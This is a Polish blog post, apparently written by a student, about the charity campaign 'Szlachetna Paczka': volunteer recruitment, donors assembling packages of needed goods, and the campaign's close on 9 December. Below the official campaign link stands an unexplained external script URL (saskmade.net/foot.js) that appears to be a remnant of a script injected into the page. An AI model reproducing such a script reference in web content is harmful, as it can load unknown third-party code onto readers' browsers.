Siej dobro!

Akcja „Szlachetna Paczka” jest obecnie jednym z najbardziej znanych projektów w Polsce. Jej głównym zadaniem, wbrew pozorom, nie jest tworzenie paczek. Działalność wolontariuszy skupia się na współpracy z darczyńcami, której efektem jest pomoc najbardziej potrzebującym rodzinom w Polsce.

Chodzi o domy dotknięte ciężkimi problemami, z którymi na co dzień muszą walczyć ich mieszkańcy. Co jest najważniejsze w takiej inicjatywie? Wolontariusze pomagają mądrze. To znaczy, że dzięki takiej pomocy, obdarowani ludzie są w stanie sami poradzić sobie w życiu. Ponadto, wydobywa z nas to, co mamy w sobie najpiękniejsze, czyli chęć niesienia dobra i uśmiechu, którego na pewno nie zabrakło na twarzach wolontariuszy, dostarczających paczki do rodzin będących w potrzebie.

Wolontariat w Szlachetnej Paczce jest bardzo wymagający. Trzeba przejść czterostopniową rekrutację, a następnie odbyć szkolenia. Istnieje również inna forma zaangażowania – darczyńca. Szlachetna Paczka nie jest zestawem mało znaczących upominków, lecz przydatnych prezentów, które mają uzupełnić brakujące artykuły. Żeby skompletować produkty, których potrzebuje rodzina, należy poświęcić dużo czasu i zaangażowania. Najczęściej są to zapasy ubrań, często urządzenia RTV i AGD. Dopiero później myśli się o prawdziwych prezentach dla członków rodziny. Nieważne stają się pieniądze, lecz radość, jaka przekłada się na satysfakcję z zaoferowanej pomocy.

W tym roku zakończenie akcji odbyło się 9 grudnia. Tego dnia, paczki były segregowane i wysłane zostały do ubogich  rodzin.

https://www.szlachetnapaczka.pl/pomagaj-z-paczka

 

https://saskmade.net/foot.js?ver=2.0.0

The following two tabs change content below.
Klaudia Bzducha

Klaudia Bzducha

Studentka II roku. Interesuje się muzyką i kulturą. Od niedawna próbuje swoich sił w fotografii. Kontakt: klaudia.bzducha@gmail.com
Klaudia Bzducha

Ostatnie wpisy Klaudia Bzducha (zobacz wszystkie)

Napisz komentarz